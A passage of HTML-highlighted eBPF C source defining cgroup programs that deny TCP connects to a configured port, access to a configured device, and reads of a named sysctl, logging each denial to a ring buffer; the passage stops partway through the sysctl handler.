&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"Dual BSD/GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== Configurable options: set by userspace before load ===== */&lt;/span&gt;
&lt;span class="cp"&gt;#define IPPROTO_TCP 6
&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                   &lt;span class="cm"&gt;/* host order */&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt; &lt;span class="cm"&gt;/* NUL-terminated */&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== ringbuf: send denied events to userspace ===== */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* 16MB */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;events&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;__always_inline&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ts_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

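&lt;span class="cm"&gt;/* Compare two NUL-terminated strings: return 1 if equal, 0 if not.
 * The loop is bounded by the compile-time constant SYSCTL_NAME_LEN so it can
 * be unrolled; max_len is not used by the loop.
 * Note: b is volatile to handle const volatile rodata arrays correctly. */&lt;/span&gt;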
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;__always_inline&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;str_eq&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;max_len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="cp"&gt;#pragma unroll
&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;cb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;cb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== 1) Network: block TCP connect4 to specified port =====
 * ctx: struct bpf_sock_addr
 * user_ip4/user_port: network byte order (need conversion)
 *
 * Return semantics:
 * - return 1: allow
 * - return 0: deny (userspace gets EPERM)
 */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cgroup/connect4"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;cg_connect4&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_sock_addr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;protocol&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;IPPROTO_TCP&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;__u16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;user_port&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;EVENT_CONNECT4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;user_ip4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* network order */&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;         &lt;span class="cm"&gt;/* host order */&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;protocol&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* deny -&amp;gt; userspace gets EPERM on connect */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== 2) Device: block access to specified major:minor =====
 * ctx: struct bpf_cgroup_dev_ctx { access_type, major, minor }
 *
 * Return semantics:
 * - return 0: deny (userspace gets EPERM)
 * - return non-zero: allow
 */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cgroup/dev"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;cg_dev&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_cgroup_dev_ctx&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;EVENT_DEVICE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;access_type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;access_type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* deny -&amp;gt; -EPERM */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== 3) Sysctl: block reads of the specified sysctl =====
 * ctx: struct bpf_sysctl
 * Use bpf_sysctl_get_name() to get the sysctl name
 *
 * Return semantics:
 * - return 0: reject
 * - return 1: proceed
 * If the program returns 0, the userspace read()/write() fails with -1 and errno=EPERM
 */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cgroup/sysctl"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;cg_sysctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_sysctl&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_sysctl_get_name&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Only deny reads, allow writes (safer for testing) */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;str_eq&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;EVENT_SYSCTL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#pragma unroll
